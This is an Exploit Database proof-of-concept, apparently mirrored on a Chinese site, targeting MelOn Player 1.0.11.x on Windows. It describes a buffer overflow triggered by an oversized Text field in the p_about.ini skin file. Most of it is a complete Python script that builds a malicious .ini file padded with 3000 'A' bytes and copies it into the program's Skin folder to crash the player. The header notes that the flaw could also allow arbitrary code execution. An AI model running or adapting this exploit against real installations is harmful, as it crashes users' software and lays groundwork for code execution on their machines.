MelOn Player 1.0.11.x – Denial of Service (PoC)

• Exploit Database
• 17 阅读

• 作者： modpr0be
  日期： 2011-09-09
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17815/

• # Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
  # Date: 09/09/2011
  # Author: modpr0be
  # Software Link: http://www.melon.co.id/cs/guide/download/player.do
  # Vulnerable version: 1.0.11.x
  # Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
  # CVE : N/A
  # Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
  
  #### Software description:
  # Melon Player is a famous software in Indonesia to play songs that are provided by 
  # the Melon portal (http://www.melon.co.id). This software can play any music 
  # file types such as mp3, wav, wma, mp4, and others. This player can also play 
  # the files on your local computer or by online streaming to the portal Melon. 
  # The songs can also be downloaded to your local computer.
  #
  #### Vulnerable information:
  # The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability 
  # when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file 
  # as part of skin template. This file will bring the program information and can be 
  # accessed on the menu (Menu → Information)), as a result of adding extra bytes to 
  # parts of the file (Text section), giving the attackers possibility to run an arbitrary 
  # code execution on the system that install Melon Player.
  #
  ### Some Conditions:
  # This is just the POC, it will just crash the program.
  # and it's unicode ;)
  #
  ##
  
  #!/usr/bin/python
  
  import os,sys,shutil,time
  
  header=("""[MAIN]
  MainStyle=SKIN
  Resize=NO
  Mask=YES
  BGStyle=IMAGE
  DefSize=0,0,427,136
  Image=skin.bmp
  Button=2
  Slider=
  Static=1
  Text=4
  Edit=
  Combo=
  
  
  [MAINBG]
  TopLeft=145,389,6,21
  TopCenter=153,389,11,21
  TopRight=166,389,6,21
  MiddleLeft=145,412,6,21
  MiddleCenter=153,412,11,21
  MiddleRight=166,412,6,21
  BottomLeft=145,435,6,34
  BottomCenter=153,435,11,34
  BottomRight=166,435,6,34
  
  [MAINMASK]
  TopLeft=174,389,10,10
  TopCenter=185,389,10,10
  TopRight=196,389,10,10
  MiddleLeft=185,389,10,10
  MiddleCenter=185,389,10,10
  MiddleRight=185,389,10,10
  BottomLeft=174,400,10,10
  BottomCenter=185,389,10,10
  BottomRight=196,400,10,10
  
  
  [BUTTON_1]
  Name=??
  ID=1001
  ResizeStyle=TOP_LEFT
  Tooltip=
  CheckBox=FALSE
  Position=410,4,13,13
  NormalRect=223,389,13,13
  OverRect=238,389,13,13
  DownRect=253,389,13,13
  DisabledRect=223,389,13,13
  MaskRect=2000,0,13,13
  
  [BUTTON_2]
  Name=??
  ID=1002
  ResizeStyle=TOP_LEFT
  Tooltip=
  CheckBox=FALSE
  Position=173,105,80,20
  NormalRect=0,763,80,20
  OverRect=0,763,80,20
  DownRect=81,763,80,20
  DisabledRect=162,763,80,20
  MaskRect=2000,0,80,20
  
  
  [STATIC_1]
  Name=???_??
  ID=2001
  Position=20,31,72,84
  TopLeft=14,478,72,84
  TopCenter=
  TopRight=
  MiddleLeft=
  MiddleCenter=
  MiddleRight=
  BottomLeft=
  BottomCenter=
  BottomRight=
  
  
  [TEXT_1]
  Name=popup Name sdw
  ID=3701
  Position=2,2,420,14
  Text=MelOn Player
  Font=Arial
  FontSize=12
  FontBold=
  Align=CENTER
  FontColor=0,0,0
  """)
  
  footer=("""
  [TEXT_3]
  Name=????
  ID=3703
  Position=104,50,243,14
  Text=Melon Player Version 1.0.0.101102
  Font=Arial
  FontSize=12
  FontBold=
  Align=
  FontColor=0,0,0
  
  [TEXT_4]
  Name=Copyright
  ID=3704
  Position=104,72,303,14
  Text=Copyright PT. Melon Indonesia. All Right Reserved.
  Font=Arial
  FontSize=12
  FontBold=
  Align=
  FontColor=0,0,0
  """)
  
  filename="p_about.ini"
  splash=os.path.abspath(filename)
  skindir="C:\Program Files\MelonPlayerID\Skin"
  
  junk = "A" * 3000
  
  buggy=("""
  [TEXT_2]
  Name=popup Name
  ID=3702
  Position=3,3,420,14
  Text="""+junk+ """
  Font=Arial
  FontSize=12
  FontBold=
  Align=CENTER
  FontColor=170,170,170\r\n""")
  
  banner=("""
  [*] MelOnPlayer 1.0.11.x Denial of Service POC
  [*] modpr0be[at]spentera[dot]com.
  [*] thanks a lot: cyb3r.anbu | otoy :)
  =====================================================
  """)
  
  file=open(filename,'w')
  if os.name == 'nt':
  	if os.path.isdir(skindir):
  		try:
  			file.write(header+buggy+footer)
  			print banner
  			print "[*] Creating the malicious .ini file.."
  			time.sleep(2)
  			print "[*] Malicious file (POC)",filename,"created.."
  			print "[*] Path:",splash
  			file.close()
  			shutil.copy2(splash,skindir)
  			print "[*] File",filename,"has been copied to",skindir
  		except IOError:
  			print "[-] Could not write to destination folder, check permission.."
  			sys.exit()
  	else:
  		print "[-] Could not find Skin directory, is MelOn Player installed?"
  		sys.exit()
  else:
  	print "[-] Please run this script on Windows."
  	sys.exit()